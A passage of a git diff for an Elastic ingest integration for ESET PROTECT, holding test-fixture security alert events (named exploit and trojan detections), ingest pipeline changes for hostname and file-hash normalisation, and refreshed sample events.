"Warning", + "source_address": "192.168.9.254", + "source_address_type": "IPv4", + "source_port": 59912, + "source_uuid": "8452d051-47ba-4203-97f5-258899a4161b", + "target_address": "1.128.0.5", + "target_address_type": "IPv4", + "target_port": 445, + "threat_name": "SMB.CVE-2011-1267", + "type": "FirewallAggregated_Event" + } + }, + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "original": "{\"event_type\":\"FirewallAggregated_Event\",\"ipv4\":\"192.168.30.31\",\"hostname\":\"machine3.domain.com\",\"source_uuid\":\"8452d051-47ba-4203-97f5-258899a4161b\",\"occured\":\"14-Mar-2024 09:52:36\",\"severity\":\"Warning\",\"event\":\"Security vulnerability exploitation attempt\",\"source_address\":\"192.168.9.254\",\"source_address_type\":\"IPv4\",\"source_port\":59912,\"target_address\":\"1.128.0.5\",\"target_address_type\":\"IPv4\",\"target_port\":445,\"protocol\":\"TCP\",\"process_name\":\"System\",\"inbound\":true,\"threat_name\":\"SMB.CVE-2011-1267\",\"aggregate_count\":1}", + "type": [ + "info" + ] + }, + "host": { + "domain": "domain.com", + "hostname": "machine3", + "id": "8452d051-47ba-4203-97f5-258899a4161b", + "ip": [ + "192.168.30.31" + ], + "name": "machine3.domain.com" + }, + "message": "Security vulnerability exploitation attempt", + "network": { + "direction": "inbound", + "protocol": "tcp" + }, + "process": { + "executable": "System", + "name": "System" + }, + "related": { + "hosts": [ + "machine3.domain.com", + "machine3", + "8452d051-47ba-4203-97f5-258899a4161b" + ], + "ip": [ + "192.168.30.31", + "192.168.9.254", + "1.128.0.5" + ] + }, + "source": { + "ip": "192.168.9.254", + "port": 59912 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "threat": { + "indicator": { + "name": "SMB.CVE-2011-1267", + "provider": "ESET PROTECT", + "sightings": 1 + } + } + }, + { + "@timestamp": "2024-03-14T09:11:13.000Z", + "destination": { + "as": { + "number": 1221, + "organization": { + "name": "Telstra Pty Ltd" + } + }, + "ip": "1.128.0.5", + "port": 8090 + }, + "ecs": { + "version": "8.11.0" + }, + "eset_protect": { + "event": { + "account": "NT AUTHORITY\\LOCAL SERVICE", + "aggregate_count": 4, + "hostname": "machine2.domain.com", + "inbound": true, + "ipv4": "192.168.30.31", + "is_handled": false, + "name": "Security vulnerability exploitation attempt", + "occured": "2024-03-14T09:11:13.000Z", + "processname": "C:\\Program Files (x86)\\Schneider Electric\\Floating License Manager\\FLEXnet Publisher License Server Manager\\lmadmin.exe", + "protocol": "TCP", + "severity": "Warning", + "source_address": "192.168.9.254", + "source_address_type": "IPv4", + "source_uuid": "ff802ef4-bfd6-4fe7-bbfb-215b6beed399", + "target_address": "1.128.0.5", + "target_address_type": "IPv4", + "target_port": 8090, + "threat_name": "JAVA/Exploit.CVE-2021-44228", + "type": "FirewallAggregated_Event" + } + }, + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "original": "{\"event_type\":\"FirewallAggregated_Event\",\"ipv4\":\"192.168.30.31\",\"hostname\":\"machine2.domain.com\",\"source_uuid\":\"ff802ef4-bfd6-4fe7-bbfb-215b6beed399\",\"occured\":\"14-Mar-2024 09:11:13\",\"severity\":\"Warning\",\"event\":\"Security vulnerability exploitation attempt\",\"source_address\":\"192.168.9.254\",\"source_address_type\":\"IPv4\",\"target_address\":\"1.128.0.5\",\"target_address_type\":\"IPv4\",\"target_port\":8090,\"protocol\":\"TCP\",\"account\":\"NT AUTHORITY\\\\LOCAL SERVICE\",\"process_name\":\"C:\\\\Program Files (x86)\\\\Schneider Electric\\\\Floating License Manager\\\\FLEXnet Publisher License Server Manager\\\\lmadmin.exe\",\"inbound\":true,\"threat_name\":\"JAVA/Exploit.CVE-2021-44228\",\"aggregate_count\":4}", + "type": [ + "info" + ] + }, + "host": { + "domain": "domain.com", + "hostname": "machine2", + "id": "ff802ef4-bfd6-4fe7-bbfb-215b6beed399", + "ip": [ + "192.168.30.31" + ], + "name": "machine2.domain.com" + }, + "message": "Security vulnerability exploitation attempt", + "network": { + "direction": "inbound", + "protocol": "tcp" + }, + "process": { + "executable": "C:\\Program Files (x86)\\Schneider Electric\\Floating License Manager\\FLEXnet Publisher License Server Manager\\lmadmin.exe", + "name": "lmadmin.exe" + }, + "related": { + "hosts": [ + "machine2.domain.com", + "machine2", + "ff802ef4-bfd6-4fe7-bbfb-215b6beed399" + ], + "ip": [ + "192.168.30.31", + "192.168.9.254", + "1.128.0.5" + ], + "user": [ + "NT AUTHORITY\\LOCAL SERVICE" + ] + }, + "source": { + "ip": "192.168.9.254" + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "threat": { + "indicator": { + "name": "JAVA/Exploit.CVE-2021-44228", + "provider": "ESET PROTECT", + "sightings": 4 + } + } + }, + { + "@timestamp": "2024-03-14T09:34:21.000Z", + "destination": { + "as": { + "number": 1221, + "organization": { + "name": "Telstra Pty Ltd" + } + }, + "ip": "1.128.0.5", + "port": 445 + }, + "ecs": { + "version": "8.11.0" + }, + "eset_protect": { + "event": { + "aggregate_count": 1, + "hostname": "machine3.domain.com", + "inbound": true, + "ipv4": "192.168.30.31", + "is_handled": false, + "name": "Security vulnerability exploitation attempt", + "occured": "2024-03-14T09:34:21.000Z", + "processname": "System", + "protocol": "TCP", + "severity": "Warning", + "source_address": "192.168.9.254", + "source_address_type": "IPv4", + "source_port": 50505, + "source_uuid": "8452d051-47ba-4203-97f5-258899a4161b", + "target_address": "1.128.0.5", + "target_address_type": "IPv4", + "target_port": 445, + "threat_name": "SMB/Exploit.DoublePulsar.B", + "type": "FirewallAggregated_Event" + } + }, + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "original": "{\"event_type\":\"FirewallAggregated_Event\",\"ipv4\":\"192.168.30.31\",\"hostname\":\"machine3.domain.com\",\"source_uuid\":\"8452d051-47ba-4203-97f5-258899a4161b\",\"occured\":\"14-Mar-2024 09:34:21\",\"severity\":\"Warning\",\"event\":\"Security vulnerability exploitation attempt\",\"source_address\":\"192.168.9.254\",\"source_address_type\":\"IPv4\",\"source_port\":50505,\"target_address\":\"1.128.0.5\",\"target_address_type\":\"IPv4\",\"target_port\":445,\"protocol\":\"TCP\",\"process_name\":\"System\",\"inbound\":true,\"threat_name\":\"SMB/Exploit.DoublePulsar.B\",\"aggregate_count\":1}", + "type": [ + "info" + ] + }, + "host": { + "domain": "domain.com", + "hostname": "machine3", + "id": "8452d051-47ba-4203-97f5-258899a4161b", + "ip": [ + "192.168.30.31" + ], + "name": "machine3.domain.com" + }, + "message": "Security vulnerability exploitation attempt", + "network": { + "direction": "inbound", + "protocol": "tcp" + }, + "process": { + "executable": "System", + "name": "System" + }, + "related": { + "hosts": [ + "machine3.domain.com", + "machine3", + "8452d051-47ba-4203-97f5-258899a4161b" + ], + "ip": [ + "192.168.30.31", + "192.168.9.254", + "1.128.0.5" + ] + }, + "source": { + "ip": "192.168.9.254", + "port": 50505 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "threat": { + "indicator": { + "name": "SMB/Exploit.DoublePulsar.B", + "provider": "ESET PROTECT", + "sightings": 1 + } + } + }, + { + "@timestamp": "2024-03-14T09:15:30.000Z", + "destination": { + "as": { + "number": 1221, + "organization": { + "name": "Telstra Pty Ltd" + } + }, + "ip": "1.128.0.5", + "port": 8813 + }, + "ecs": { + "version": "8.11.0" + }, + "eset_protect": { + "event": { + "account": "NT AUTHORITY\\SYSTEM", + "aggregate_count": 2, + "hostname": "machine2.domain.com", + "inbound": true, + "ipv4": "192.168.30.31", + "is_handled": false, + "name": "Security vulnerability exploitation attempt", + "occured": "2024-03-14T09:15:30.000Z", + "processname": "D:\\sw\\Environmental Manager\\EnvironmentalManagerService.exe", + "protocol": "TCP", + "severity": "Warning", + "source_address": "192.168.9.254", + "source_address_type": "IPv4", + "source_uuid": "ff802ef4-bfd6-4fe7-bbfb-215b6beed399", + "target_address": "1.128.0.5", + "target_address_type": "IPv4", + "target_port": 8813, + "threat_name": "JAVA/Exploit.CVE-2021-44228", + "type": "FirewallAggregated_Event" + } + }, + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "original": "{\"event_type\":\"FirewallAggregated_Event\",\"ipv4\":\"192.168.30.31\",\"hostname\":\"machine2.domain.com\",\"source_uuid\":\"ff802ef4-bfd6-4fe7-bbfb-215b6beed399\",\"occured\":\"14-Mar-2024 09:15:30\",\"severity\":\"Warning\",\"event\":\"Security vulnerability exploitation attempt\",\"source_address\":\"192.168.9.254\",\"source_address_type\":\"IPv4\",\"target_address\":\"1.128.0.5\",\"target_address_type\":\"IPv4\",\"target_port\":8813,\"protocol\":\"TCP\",\"account\":\"NT AUTHORITY\\\\SYSTEM\",\"process_name\":\"D:\\\\sw\\\\Environmental Manager\\\\EnvironmentalManagerService.exe\",\"inbound\":true,\"threat_name\":\"JAVA/Exploit.CVE-2021-44228\",\"aggregate_count\":2}", + "type": [ + "info" + ] + }, + "host": { + "domain": "domain.com", + "hostname": "machine2", + "id": "ff802ef4-bfd6-4fe7-bbfb-215b6beed399", + "ip": [ + "192.168.30.31" + ], + "name": "machine2.domain.com" + }, + "message": "Security vulnerability exploitation attempt", + "network": { + "direction": "inbound", + "protocol": "tcp" + }, + "process": { + "executable": "D:\\sw\\Environmental Manager\\EnvironmentalManagerService.exe", + "name": "EnvironmentalManagerService.exe" + }, + "related": { + "hosts": [ + "machine2.domain.com", + "machine2", + "ff802ef4-bfd6-4fe7-bbfb-215b6beed399" + ], + "ip": [ + "192.168.30.31", + "192.168.9.254", + "1.128.0.5" + ], + "user": [ + "NT AUTHORITY\\SYSTEM" + ] + }, + "source": { + "ip": "192.168.9.254" + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "threat": { + "indicator": { + "name": "JAVA/Exploit.CVE-2021-44228", + "provider": "ESET PROTECT", + "sightings": 2 + } + } + }, + { + "@timestamp": "2024-03-12T11:00:26.000Z", + "destination": { + "as": { + "number": 1221, + "organization": { + "name": "Telstra Pty Ltd" + } + }, + "ip": "1.128.0.5", + "port": 49677 + }, + "ecs": { + "version": "8.11.0" + }, + "eset_protect": { + "event": { + "account": "NT AUTHORITY\\SYSTEM", + "aggregate_count": 1, + "hostname": "machine4", + "inbound": true, + "ipv4": "1.128.0.5", + "is_handled": false, + "name": "Web threat", + "occured": "2024-03-12T11:00:26.000Z", + "processname": "C:\\Windows\\System32\\lsass.exe", + "protocol": "TCP", + "severity": "Fatal", + "source_address": "192.168.30.32", + "source_address_type": "IPv4", + "source_port": 37966, + "source_uuid": "c539dbdf-2063-477b-81d7-8081a6f7a080", + "target_address": "1.128.0.5", + "target_address_type": "IPv4", + "target_port": 49677, + "threat_name": "RPC/Exploit.CVE-2020-1472", + "type": "FirewallAggregated_Event" + } + }, + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "original": "{\"event_type\":\"FirewallAggregated_Event\",\"ipv4\":\"1.128.0.5\",\"hostname\":\"machine4\",\"source_uuid\":\"c539dbdf-2063-477b-81d7-8081a6f7a080\",\"occured\":\"12-Mar-2024 11:00:26\",\"severity\":\"Fatal\",\"event\":\"Web threat\",\"source_address\":\"192.168.30.32\",\"source_address_type\":\"IPv4\",\"source_port\":37966,\"target_address\":\"1.128.0.5\",\"target_address_type\":\"IPv4\",\"target_port\":49677,\"protocol\":\"TCP\",\"account\":\"NT AUTHORITY\\\\SYSTEM\",\"process_name\":\"C:\\\\Windows\\\\System32\\\\lsass.exe\",\"inbound\":true,\"threat_name\":\"RPC/Exploit.CVE-2020-1472\",\"aggregate_count\":1}", + "type": [ + "info" + ] + }, + "host": { + "hostname": "machine4", + "id": "c539dbdf-2063-477b-81d7-8081a6f7a080", + "ip": [ + "1.128.0.5" + ], + "name": "machine4" + }, + "message": "Web threat", + "network": { + "direction": "inbound", + "protocol": "tcp" + }, + "process": { + "executable": "C:\\Windows\\System32\\lsass.exe", + "name": "lsass.exe" + }, + "related": { + "hosts": [ + "machine4", + "c539dbdf-2063-477b-81d7-8081a6f7a080" + ], + "ip": [ + "1.128.0.5", + "192.168.30.32" + ], + "user": [ + "NT AUTHORITY\\SYSTEM" + ] + }, + "source": { + "ip": "192.168.30.32", + "port": 37966 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "threat": { + "indicator": { + "name": "RPC/Exploit.CVE-2020-1472", + "provider": "ESET PROTECT", + "sightings": 1 + } + } + }, + { + "@timestamp": "2024-03-11T05:56:58.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset_protect": { + "event": { + "action_taken": "Cleaned by deleting", + "circumstances": "Event occurred during an attempt to access the file.", + "engine_version": "28873 (20240310)", + "firstseen": "2021-07-28T07:20:55.000Z", + "hash": "1A45EBA0F9EF909E6F3C87B0D5CEDAD27BDB6CF2", + "hostname": "machine5", + "ipv4": "192.168.30.31", + "is_handled": false, + "need_restart": false, + "object_type": "File", + "object_uri": "file:///E:/Removable Drive (1GB).lnk", + "occured": "2024-03-11T05:56:58.000Z", + "processname": "C:\\Windows\\explorer.exe", + "scan_id": "virlog.dat", + "scanner_id": "Real-time file system protection", + "severity": "Warning", + "source_uuid": "f193d96b-cbd8-4402-94fc-6993efc30b11", + "threat_handled": true, + "threat_name": "LNK/Agent.BZ", + "threat_type": "Trojan", + "type": "Threat_Event", + "username": "machine5\\Administrator" + } + }, + "event": { + "action": "cleaned-by-deleting", + "category": [ + "threat" + ], + "kind": "alert", + "original": "{\"event_type\":\"Threat_Event\",\"ipv4\":\"192.168.30.31\",\"hostname\":\"machine5\",\"source_uuid\":\"f193d96b-cbd8-4402-94fc-6993efc30b11\",\"occured\":\"11-Mar-2024 05:56:58\",\"severity\":\"Warning\",\"threat_type\":\"Trojan\",\"threat_name\":\"LNK/Agent.BZ\",\"scanner_id\":\"Real-time file system protection\",\"scan_id\":\"virlog.dat\",\"engine_version\":\"28873 (20240310)\",\"object_type\":\"File\",\"object_uri\":\"file:///E:/Removable Drive (1GB).lnk\",\"action_taken\":\"Cleaned by deleting\",\"threat_handled\":true,\"need_restart\":false,\"username\":\"machine5\\\\Administrator\",\"processname\":\"C:\\\\Windows\\\\explorer.exe\",\"circumstances\":\"Event occurred during an attempt to access the file.\",\"firstseen\":\"28-Jul-2021 07:20:55\",\"hash\":\"1A45EBA0F9EF909E6F3C87B0D5CEDAD27BDB6CF2\"}", + "reason": "Event occurred during an attempt to access the file.", + "type": [ + "indicator" + ] + }, + "file": { + "directory": "/", + "drive_letter": "E", + "name": "Removable Drive (1GB).lnk", + "path": "E:/Removable Drive (1GB).lnk", + "type": "file", + "hash": { + "sha1": "1a45eba0f9ef909e6f3c87b0d5cedad27bdb6cf2" + } + }, + "host": { + "hostname": "machine5", + "id": "f193d96b-cbd8-4402-94fc-6993efc30b11", + "ip": [ + "192.168.30.31" + ], + "name": "machine5" + }, + "process": { + "executable": "C:\\Windows\\explorer.exe", + "name": "explorer.exe" + }, + "related": { + "hash": [ + "1a45eba0f9ef909e6f3c87b0d5cedad27bdb6cf2" + ], + "hosts": [ + "machine5", + "f193d96b-cbd8-4402-94fc-6993efc30b11" + ], + "ip": [ + "192.168.30.31" + ], + "user": [ + "Administrator" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "threat": { + "indicator": { + "file": { + "hash": { + "sha1": "1a45eba0f9ef909e6f3c87b0d5cedad27bdb6cf2" + } + }, + "first_seen": "2021-07-28T07:20:55.000Z", + "name": "LNK/Agent.BZ", + "provider": "ESET PROTECT", + "type": "file" + } + }, + "user": { + "domain": "machine5", + "name": "Administrator" + } + }, + { + "@timestamp": "2024-03-27T09:54:20.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset_protect": { + "event": { + "action_taken": "Blocked", + "engine_version": "28962 (20240327)", + "group_name": "All", + "hash": "22B9B35A804A7A3739CBD007E00959075AECF0FC", + "hostname": "kate-ebademo", + "ipv4": "192.168.112.128", + "is_handled": false, + "need_restart": false, + "object_type": "File", + "object_uri": "script", + "occured": "2024-03-27T09:54:20.000Z", + "os_name": "Microsoft Windows 11 Pro", + "processname": "PowerShell_C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe_10.0.22621.1", + "scan_id": "virlog.dat", + "scanner_id": "Script scanner", + "severity": "Warning", + "source_uuid": "16b429cb-c064-4a31-98ba-62fff54f0c96", + "threat_handled": true, + "threat_name": "VBS/TrojanDownloader.Agent.YUI", + "threat_type": "Trojan", + "type": "Threat_Event", + "username": "KATE-EBADEMO\\Kate" + } + }, + "event": { + "action": "blocked", + "category": [ + "threat" + ], + "kind": "alert", + "original": "{\"event_type\":\"Threat_Event\",\"ipv4\":\"192.168.112.128\",\"ipv6\":\"\",\"hostname\":\"kate-ebademo\",\"source_uuid\":\"16b429cb-c064-4a31-98ba-62fff54f0c96\",\"os_name\":\"Microsoft Windows 11 Pro\",\"occured\":\"27-Mar-2024 09:54:20\",\"group_name\":\"All\",\"group_description\":\"\",\"severity\":\"Warning\",\"threat_type\":\"Trojan\",\"threat_name\":\"VBS\\/TrojanDownloader.Agent.YUI\",\"threat_flags\":\"\",\"scanner_id\":\"Script scanner\",\"scan_id\":\"virlog.dat\",\"engine_version\":\"28962 (20240327)\",\"object_type\":\"File\",\"object_uri\":\"script\",\"action_taken\":\"Blocked\",\"action_error\":\"\",\"threat_handled\":\"true\",\"need_restart\":\"false\",\"username\":\"KATE-EBADEMO\\\\Kate\",\"processname\":\"PowerShell_C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe_10.0.22621.1\",\"circumstances\":\"\",\"firstseen\":\"\",\"hash\":\"22B9B35A804A7A3739CBD007E00959075AECF0FC\"}", + "type": [ + "indicator" + ] + }, + "file": { + "path": "script", + "type": "file", + "hash": { + "sha1": "22b9b35a804a7a3739cbd007e00959075aecf0fc" + } + }, + "group": { + "name": "All" + }, + "host": { + "hostname": "kate-ebademo", + "id": "16b429cb-c064-4a31-98ba-62fff54f0c96", + "ip": [ + "192.168.112.128" + ], + "name": "kate-ebademo", + "os": { + "name": "Microsoft Windows 11 Pro" + } + }, + "process": { + "executable": "PowerShell_C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe_10.0.22621.1", + "name": "powershell.exe_10.0.22621.1" + }, + "related": { + "hash": [ + "22b9b35a804a7a3739cbd007e00959075aecf0fc" + ], + "hosts": [ + "kate-ebademo", + "16b429cb-c064-4a31-98ba-62fff54f0c96" + ], + "ip": [ + "192.168.112.128" + ], + "user": [ + "Kate" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "threat": { + "indicator": { + "file": { + "hash": { + "sha1": "22b9b35a804a7a3739cbd007e00959075aecf0fc" + } + }, + "name": "VBS/TrojanDownloader.Agent.YUI", + "provider": "ESET PROTECT", + "type": "file" + } + }, + "user": { + "domain": "KATE-EBADEMO", + "name": "Kate" + } } ] } \ No newline at end of file diff --git a/packages/eset_protect/data_stream/event/elasticsearch/ingest_pipeline/default.yml b/packages/eset_protect/data_stream/event/elasticsearch/ingest_pipeline/default.yml index 89d56984ec3..d8f4310126a 100644 --- a/packages/eset_protect/data_stream/event/elasticsearch/ingest_pipeline/default.yml +++ b/packages/eset_protect/data_stream/event/elasticsearch/ingest_pipeline/default.yml @@ -80,16 +80,37 @@ processors: target_field: eset_protect.event.hostname ignore_missing: true - set: - field: host.hostname - tag: set_host_hostname_from_event_hostname + field: host.name + tag: set_host_name_from_event_hostname copy_from: eset_protect.event.hostname - ignore_empty_value: true + if: ctx.eset_protect?.event?.hostname?.contains('.') == true + - grok: + field: eset_protect.event.hostname + tag: grok_host_hostname_and_domain_from_event_hostname + patterns: + - '(%{DATA:host.hostname}\.%{GREEDYDATA:host.domain}|%{GREEDYDATA:host.hostname})' + if: ctx.eset_protect?.event?.hostname != null + - set: + field: host.name + tag: set_host_name_from_host_hostname + copy_from: host.hostname + if: ctx.host?.hostname != null && ctx.host.name == null + - lowercase: + field: host.name + tag: lowercase_host_name + ignore_missing: true + - append: + field: related.hosts + tag: append_host_name_into_related_hosts + value: "{{{host.name}}}" + allow_duplicates: false + if: ctx.host?.name != null - append: field: related.hosts tag: append_hostname_into_related_hosts - value: "{{{eset_protect.event.hostname}}}" + value: "{{{host.hostname}}}" allow_duplicates: false - if: ctx.eset_protect?.event?.hostname != null + if: ctx.host?.hostname != null - convert: field: json.ipv4 tag: convert_ipv4_to_ip @@ -193,12 +214,6 @@ processors: tag: set_threat_indicator_provider value: ESET PROTECT if: ctx.eset_protect?.event?.type != null && ['Threat_Event','HipsAggregated_Event','FirewallAggregated_Event','FilteredWebsites_Event','BlockedFiles_Event'].contains(ctx.eset_protect.event.type) - - set: - field: threat.indicator.file.hash.sha1 - tag: set_threat_indicator_file_hash_sha1 - copy_from: json.hash - ignore_empty_value: true - if: ctx.eset_protect?.event?.type == 'BlockedFiles_Event' || ctx.json?.object_type?.toLowerCase() == 'file' - set: field: threat.indicator.type tag: set_threat_indicator_type @@ -413,13 +428,33 @@ processors: tag: rename_hash target_field: eset_protect.event.hash ignore_missing: true + - set: + field: file.hash.sha1 + tag: set_file_hash_sha1_from_eset_protect_event_hash + copy_from: eset_protect.event.hash + ignore_empty_value: true + if: ctx.eset_protect?.event?.type == 'BlockedFiles_Event' || 'file'.equalsIgnoreCase(ctx.json?.object_type) + - lowercase: + field: file.hash.sha1 + tag: lowercase_file_hash_sha1 + ignore_missing: true + - set: + field: threat.indicator.file.hash.sha1 + tag: set_threat_indicator_file_hash_sha1 + copy_from: file.hash.sha1 + ignore_empty_value: true + if: ctx.eset_protect?.event?.type == 'BlockedFiles_Event' || 'file'.equalsIgnoreCase(ctx.json?.object_type) - append: field: related.hash - tag: append_hash_into_related_hash + tag: append_eset_protect_event_hash_into_related_hash value: "{{{eset_protect.event.hash}}}" allow_duplicates: false if: ctx.eset_protect?.event?.hash != null - - convert: + - lowercase: + field: related.hash + tag: lowercase_file_hash_sha1 + ignore_missing: true + - convert: field: json.inbound tag: convert_inbound_to_boolean target_field: eset_protect.event.inbound @@ -449,11 +484,29 @@ processors: tag: rename_object_type target_field: eset_protect.event.object_type ignore_missing: true + - set: + field: file.type + value: file + tag: set_file_type_file + if: ctx.eset_protect?.event?.object_type?.toLowerCase() == 'file' - rename: field: json.object_uri tag: rename_object_uri target_field: eset_protect.event.object_uri ignore_missing: true + - set: + field: file.path + if: "ctx.eset_protect?.event?.object_uri != null && ctx.eset_protect?.event?.object_type?.toLowerCase() == 'file'" + copy_from: eset_protect.event.object_uri + - grok: + field: file.path + tag: grok_file_path + patterns: + - '^(file:///)?%{FILEPATH:file.path}$' + - '.*/(?.+\.(?.+))$' + pattern_definitions: + FILEPATH: '(?\w):(?/.*/|/)?(?.+(\.(?.+))?)?' + if: ctx.file?.path != null && ctx.file?.path != 'script' - rename: field: json.operation tag: rename_operation @@ -480,8 +533,8 @@ processors: ignore_missing: true patterns: - '^%{GREEDYDATA:json._temp}\\%{DATA:process.name}$' - - "^%{GREEDYDATA:json._temp}/%{DATA:process.name}$" - - "^%{DATA:process.name}$" + - '^%{GREEDYDATA:json._temp}/%{DATA:process.name}$' + - '^%{DATA:process.name}$' if: ctx.eset_protect?.event?.processname != '' on_failure: - append: @@ -752,8 +805,8 @@ processors: patterns: - '^%{HOSTNAME:user.domain}\\%{USERNAME:user.name}$' - '^%{HOSTNAME:user.domain}\\\\%{USERNAME:user.name}$' - - "^%{USERNAME:user.name}@%{HOSTNAME:user.domain}$" - - "^%{GREEDYDATA:user.name}$" + - '^%{USERNAME:user.name}@%{HOSTNAME:user.domain}$' + - '^%{GREEDYDATA:user.name}$' if: ctx.eset_protect?.event?.username != '' on_failure: - append: diff --git a/packages/eset_protect/data_stream/event/sample_event.json b/packages/eset_protect/data_stream/event/sample_event.json index 4cb659360c7..1232a4204f8 100644 --- a/packages/eset_protect/data_stream/event/sample_event.json +++ b/packages/eset_protect/data_stream/event/sample_event.json @@ -1,11 +1,11 @@ { "@timestamp": "2021-06-21T03:56:20.000Z", "agent": { - "ephemeral_id": "677639c3-b8cb-4791-bd2d-a6f2c144f964", - "id": "7e7335eb-8b8a-400b-9634-4d8caf719b70", + "ephemeral_id": "c8765a56-3694-4bf7-aada-7f979a9581cd", + "id": "e270d8a1-0a98-417c-a79f-840c446ad79a", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.12.0" + "version": "8.12.2" }, "data_stream": { "dataset": "eset_protect.event", @@ -37,9 +37,9 @@ "version": "8.11.0" }, "elastic_agent": { - "id": "7e7335eb-8b8a-400b-9634-4d8caf719b70", - "snapshot": true, - "version": "8.12.0" + "id": "e270d8a1-0a98-417c-a79f-840c446ad79a", + "snapshot": false, + "version": "8.12.2" }, "eset_protect": { "event": { @@ -72,7 +72,7 @@ "web" ], "dataset": "eset_protect.event", - "ingested": "2024-01-04T10:10:20Z", + "ingested": "2024-03-27T16:01:32Z", "kind": "alert", "original": "{\"event_type\":\"FilteredWebsites_Event\",\"ipv4\":\"192.168.30.30\",\"hostname\":\"win-test\",\"group_name\":\"All/Lost & found\",\"os_name\":\"Microsoft Windows 11 Pro\",\"group_description\":\"Lost & found static group\",\"source_uuid\":\"d9477661-8fa4-4144-b8d4-e37b983bcd69\",\"occured\":\"21-Jun-2021 03:56:20\",\"severity\":\"Warning\",\"event\":\"An attempt to connect to URL\",\"target_address\":\"89.160.20.128\",\"target_address_type\":\"IPv4\",\"scanner_id\":\"HTTP filter\",\"action_taken\":\"blocked\",\"object_uri\":\"https://test.com\",\"hash\":\"ABCDAA625E6961037B8904E113FD0C232A7D0EDC\",\"username\":\"WIN-TEST\\\\Administrator\",\"processname\":\"C:\\\\Program Files\\\\Web browser\\\\brwser.exe\",\"rule_id\":\"Blocked by PUA blacklist\"}", "type": [ @@ -88,6 +88,7 @@ "ip": [ "192.168.30.30" ], + "name": "win-test", "os": { "name": "Microsoft Windows 11 Pro" } @@ -97,7 +98,7 @@ }, "log": { "source": { - "address": "192.168.64.8:46716" + "address": "172.19.0.11:48112" }, "syslog": { "appname": "ERAServer", @@ -121,7 +122,7 @@ }, "related": { "hash": [ - "ABCDAA625E6961037B8904E113FD0C232A7D0EDC" + "abcdaa625e6961037b8904e113fd0c232a7d0edc" ], "hosts": [ "win-test", diff --git a/packages/eset_protect/docs/README.md b/packages/eset_protect/docs/README.md index 861c8cd3507..632fb441083 100644 --- a/packages/eset_protect/docs/README.md +++ b/packages/eset_protect/docs/README.md @@ -77,8 +77,8 @@ An example event for `detection` looks as following: { "@timestamp": "2023-10-26T13:36:53.000Z", "agent": { - "ephemeral_id": "eaf0a213-9722-4532-9223-51619c3f6c91", - "id": "7e7335eb-8b8a-400b-9634-4d8caf719b70", + "ephemeral_id": "96cc7ee0-ede2-46a4-9b0e-4104dead04cc", + "id": "78166295-0693-4726-a27f-cd8722896c22", "name": "docker-fleet-agent", "type": "filebeat", "version": "8.12.0" @@ -114,8 +114,8 @@ An example event for `detection` looks as following: "version": "8.11.0" }, "elastic_agent": { - "id": "7e7335eb-8b8a-400b-9634-4d8caf719b70", - "snapshot": true, + "id": "78166295-0693-4726-a27f-cd8722896c22", + "snapshot": false, "version": "8.12.0" }, "eset_protect": { @@ -151,7 +151,7 @@ An example event for `detection` looks as following: "intrusion_detection" ], "dataset": "eset_protect.detection", - "ingested": "2024-01-04T10:08:34Z", + "ingested": "2024-03-18T21:48:09Z", "kind": "alert", "original": "{\"category\":\"DETECTION_CATEGORY_NETWORK_INTRUSION\",\"context\":{\"circumstances\":\"Eicar\",\"deviceUuid\":\"xxx-xxxx-1234-5678-xxxxxxxxxxxx\",\"process\":{\"path\":\"C:\\\\Windows\\\\chrome.exe\"},\"userName\":\"testingpc\\\\example\"},\"networkCommunication\":{\"protocolName\":\"0\",\"remoteIpAddress\":\"89.160.20.112\",\"remotePort\":443},\"objectHashSha1\":\"AAF4C61DDCC5E8A2DABEDE0F3B4820123456789D\",\"objectTypeName\":\"File\",\"objectUrl\":\"C:\\\\Temp\\\\06516f11-xxxx-xxxx-xxxx-37da66b5de99_ccf7464ba6e2e12e984514f694bfb10d03de77358d8a3afd7a2ffed150ec1df8.zip.e99\\\\ccf7464ba6e2e12e984514f694bfb10d03de77358d8a3afd7a2ffed150ec1df8\",\"occurTime\":\"2023-10-26T13:36:53Z\",\"responses\":[{}],\"severityLevel\":\"SEVERITY_LEVEL_MEDIUM\",\"typeName\":\"TCP Port scanning attack\",\"uuid\":\"xxx-xxxx-xxxx-1234-xxxxxxxxxxxx\"}", "type": [ @@ -160,7 +160,7 @@ An example event for `detection` looks as following: }, "file": { "hash": { - "sha1": "AAF4C61DDCC5E8A2DABEDE0F3B4820123456789D" + "sha1": "aaf4c61ddcc5e8a2dabede0f3b4820123456789d" } }, "host": { @@ -181,7 +181,7 @@ An example event for `detection` looks as following: }, "related": { "hash": [ - "AAF4C61DDCC5E8A2DABEDE0F3B4820123456789D" + "aaf4c61ddcc5e8a2dabede0f3b4820123456789d" ], "hosts": [ "xxx-xxxx-1234-5678-xxxxxxxxxxxx" @@ -265,13 +265,13 @@ An example event for `device_task` looks as following: ```json { - "@timestamp": "2024-01-04T10:09:14.915Z", + "@timestamp": "2024-03-27T16:00:29.582Z", "agent": { - "ephemeral_id": "3873a5a6-ab80-4d05-b35a-e91aa4c7f86e", - "id": "7e7335eb-8b8a-400b-9634-4d8caf719b70", + "ephemeral_id": "c5a8ca66-614e-438e-b69a-9e12cb12aa7d", + "id": "e270d8a1-0a98-417c-a79f-840c446ad79a", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.12.0" + "version": "8.12.2" }, "data_stream": { "dataset": "eset_protect.device_task", 